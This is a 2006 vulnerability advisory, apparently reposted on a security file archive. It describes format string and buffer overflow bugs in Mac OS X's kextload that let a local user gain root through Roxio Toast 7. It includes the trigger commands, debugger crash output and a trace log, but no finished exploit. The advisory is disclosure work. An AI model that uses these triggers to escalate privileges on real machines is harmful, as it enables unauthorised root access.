what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New


Posted Sep 14, 2006
Authored by Adriel T. Desautels | Site netragard.com

Roxio Toast 7 Titanium on Mac OSX executes the kextload command with root privileges. The kextload command contains two vulnerabilities which can be exploited by a local user to gain local root access to the system. This advisory outlines both issues.

tags | advisory, local, root, vulnerability
systems | apple
SHA-256 | 4d9a1d1c4b802566deb492490350c56c3638f0b626e4adf257715a70770d86bb


Change Mirror Download
Hash: SHA1

******************** Netragard, L.L.C Advisory* *******************

~ Strategic Reconnaissance Team

~ ------------------------------------------------
~ http://www.netragard.com -- "We make I.T. Safe."

[About Netragard]
- ----------------------------------------------------------------------
Netragard is a unique I.T. Security company whose services are fortified
by continual vulnerability research and development. This ongoing
research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products and
Web Applications commonly used by businesses internationally. We apply
the knowledge gained by performing this research to our professional
security services. This in turn enables us to produce high quality
deliverables that are the product of talented security professionals and
not those of automated scanners and tools. This advisory is the product
of research done by the Strategic Reconnaissance Team.

[Official URL]
- ----------------------------------------------------------------------

[Advisory Information]
- ----------------------------------------------------------------------
Contact : Adriel T. Desautels
Advisory ID : NETRAGARD-20060822
Product Name : Apple OSX
Product Version : ALL
Helper Application : Roxio Toast 7 Titanium
Vendor Name : Apple Computer Corporation
Type of Vulnerability : Local Root Compromise (via kextload)
Effort : Easy
Operating System : OSX

- ----------------------------------------------------------------------
Other : A vulnerability exists in OSX kexload program
~ which affects the security of Roxio Toast 7 and may affect
other applications.

This advisory contains two vulnerabilities in the kext load

1-) Format String Vulnerability
2-) Buffer Overflow Vulnerability

[Product Description]
- ----------------------------------------------------------------------
"Toast 7 is the best way to save, share and enjoy a lifetime of digital
music, movies and photos on CD and DVD. Burn large files across
multiple discs; compress and copy DVD movies; add over 50 hours of
music to an audio DVD with on-screen TV menus, shuffle play, and rich
Dolby Digital sound; burn DivX files into DVDs. Do it all with the
fastest and most reliable burning software for the Mac OS - Toast."

- --http://www.roxio.com--

[Technical Summary]
- ----------------------------------------------------------------------
Roxio toast executes the kextload command with root privileges. The
kextload command contains two vulnerabilities which can be exploited
by a local user to gain local root access to the system. This advisory
outlines both issues.

The kextload program is used to explicitly load kernel extensions
(kexts), validate them to see that they can be loaded by other
mechanisms, such as kextd(8), and to generate symbol files for
debugging the kext in a running ker-nel. In order to load a kext into
the kernel kextload must be invoked as the superuser; for all other
uses it can be invoked by any user.

!!Important Note: A user requires root to run kextload properly or!!
!! kextload needs to be run by a helper application !!
!! with root privileges. !!

[Technical Details]
- ----------------------------------------------------------------------
1-) kextload format string vulnerability.

Executing "sudo kextload %x.%x.%x.%x.%x.%x" demonstrates the
vulnerability. The code which enables this format string
vulnerability can be found in "prelink.c" and reads as

fprintf(stderr, kext_path);

netragard-test$ sudo kextload %x.%x.%x.%x.%x.%x
kextload: /Users/test/90b4b6ca.1c.69737473.65206578.68206275.6e646c65:\
no such bundle file exists
can't add kernel extension %x.%x.%x.%x.%x.%x (file access/permissions\
) (run kextload on this kext with -t for diagnostic output)

2-) Buffer Overflow Vulnerability

Executing kextload `perl -e 'print "A" x 1022'` causes a
buffer overflow. We can see that critical memory segments
have been overwritten by "A" in the example below.

(A is represented as 0x41)

(gdb) r `perl -e 'print "A" x 1023'`
Starting program: /sbin/kextload `perl -e 'print "A" x 1023'`
memory allocation or string conversion error
Program exited with code 01.

(gdb) r `perl -e 'print "A" x 1022'`
Starting program: /sbin/kextload `perl -e 'print "A" x 1022'`
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x41414149
0x90bf37a4 in _KXKextManagerLogMessageAtLevel ()

3-) How does this affect roxio toast 7 (and any other application that
~ calls kextload)?

When Roxio Toast 7 calls the kextload command it uses root privileges.
When an attacker successfully attacks the kextload vulnerability using
Roxio Toast 7 as the helper application the attacker is able to steal
the root privileges and gain root level access to the system.

4-) Example of kextload format string vulnerability affecting
~ TDIXSupport

netragard-test:$ ./TDIXSupport %x%x%x%x%x%x%/TDIXController.kext
kextload: /Library/Application Support/Roxio/90b4b6ca1c69737473652065\
78682062756e646c65/TDIXController.kext: no such bundle file exists
can't add kernel extension %x%x%x%x%x%x%/TDIXController.kext (file ac\
cess/permissions) (run kextload on this kext with -t for diagnostic o\

5-) Example kextload buffer overflow vulnerability affecting
~ TDIXsupport

netragard-test:$ sudo ktrace -di ./TDIXSupport `perl -e 'print "A" x \
1067 security_authtra CALL sendto(0x7,0xbfffde14,0x36,0,0,0)
1067 security_authtra GIO fd 7 wrote 54 bytes
~ "<37>Jul 8 11:31:58 authexec: executing /sbin/kextload"
1067 security_authtra RET sendto 54/0x36
1067 security_authtra CALL execve(0xbfffec61,0xbfffebb4,0x300af0)
1067 security_authtra NAMI "/sbin/kextload"
1067 kextload PSIG SIGSEGV SIG_DFL
1066 TDIXSupport GIO fd 7 read 0 bytes
~ ""
1066 TDIXSupport RET read 0
1066 TDIXSupport CALL close(0x7)
1066 TDIXSupport RET close 0
1066 TDIXSupport CALL exit(0xe00002c0)

[Proof Of Concept]
- ----------------------------------------------------------------------
Buffer OVerflow Exploit – being developed
Format String Exploit - being developed

[Vendor Status]
- ----------------------------------------------------------------------
Vendor Notified.

- ---------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
Version: GnuPG v1.4.3 (Darwin)


Login or Register to add favorites

File Archive:

September 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    2 Files
  • 2
    Sep 2nd
    21 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    17 Files
  • 5
    Sep 5th
    34 Files
  • 6
    Sep 6th
    29 Files
  • 7
    Sep 7th
    11 Files
  • 8
    Sep 8th
    25 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    26 Files
  • 12
    Sep 12th
    23 Files
  • 13
    Sep 13th
    17 Files
  • 14
    Sep 14th
    22 Files
  • 15
    Sep 15th
    16 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    19 Files
  • 19
    Sep 19th
    60 Files
  • 20
    Sep 20th
    23 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    8 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    17 Files
  • 26
    Sep 26th
    3 Files
  • 27
    Sep 27th
    13 Files
  • 28
    Sep 28th
    5 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By